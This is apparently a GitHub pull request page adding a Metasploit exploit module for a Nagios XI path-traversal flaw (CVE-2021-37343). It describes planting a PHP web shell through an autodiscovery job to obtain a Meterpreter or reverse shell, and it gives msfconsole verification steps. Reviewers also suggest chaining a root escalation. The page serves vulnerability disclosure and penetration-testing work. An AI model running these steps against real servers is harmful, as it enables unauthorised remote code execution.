-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Nagios XI Web Shell Upload Module (CVE-2021-37343) #16150
Conversation
modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
Outdated
Show resolved
Hide resolved
…h configuration, and used vars_get in a couple of places
modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
Outdated
Show resolved
Hide resolved
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Retested after merging @space-r7 's recent suggestion/commit in
|
Thanks for the mention @jbaines-r7! This looks great! I'm happy to hear you were able to get some use out of my mixin and scanner. If you ever have some extra time, there are several additional RCE vectors that were found in recent years that could still be added, like these. I was planning to look into that at some point, but I never got around to it. |
Here's a test on version
Regarding the |
I added the
|
Release NotesThis exploits a path traversal vulnerability in Nagios XI versions below |
@jbaines-r7 cool module! but why not completing the chain with CVE-2021-37347 to get root? ;) |
Description
This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343). The path traversal allows a remote and authenticated administrator to upload a PHP web shell and execute code as
www-data
. The module achieves this by creating an autodiscovery job with anid
field containing a path traversal to a writable and remotely accessible directory, andcustom_ports
field containing the web shell. A cron file will be created using the chosen path and file name, and the web shell is embedded in the cron file.After the web shell has been written to the victim, this module will then use the web shell to establish a Meterpreter session or a reverse shell. By default, the web shell is deleted by the module, and the autodiscovery job is removed as well.
Additional Details
I tied the module into @ErikWynter 's Nagios XI scanner (great stuff, Erik!). I only needed to slide in identifying information and all worked well. Rubocop had a few things to say about
rce_check.rb
that made the diff slightly bigger but nothing crazy.msftidy
does have two complaints still aboutrce_check.rb
- I would have fixed them but they are absolutely meaningless to me, hopefully a reviewer can provide guidance:One thing I opted not to include in the module was the
finish install
logic that appears in a couple of other Nagios modules. The same logic appears innagios_xi_scanner
so it didn't seem right to copy and paste into my module as well.The final oddity is that I left the affected versions to be 5.2.0 >= x < 5.8.5. Pre-5.2.0 is super old and I didn't feel like it was necessary to go spelunking back any further. Interestingly, the code at 5.2.0 is actually vulnerable to command injection (not just path traversal), I guess that probably received some sort of CVE along the way.
Here is the vulnerable bit at 5.2.0 (the issue is
$tmpfile
):vs. 5.8.4:
Verification
Install Nagios XI 5.8.4 as described in the modules documentation.
msfconsole
use auxiliary/scanner/http/nagios_xi_scanner
set RHOST <ip>
set PASSWORD <password
use exploit/linux/http/nagios_xi_autodiscovery_webshell
set RHOST <ip>
set PASSWORD <password>
check
set LHOST <ip>
run
Video || GTFO
https://www.youtube.com/watch?v=ZhEvtjqFLVI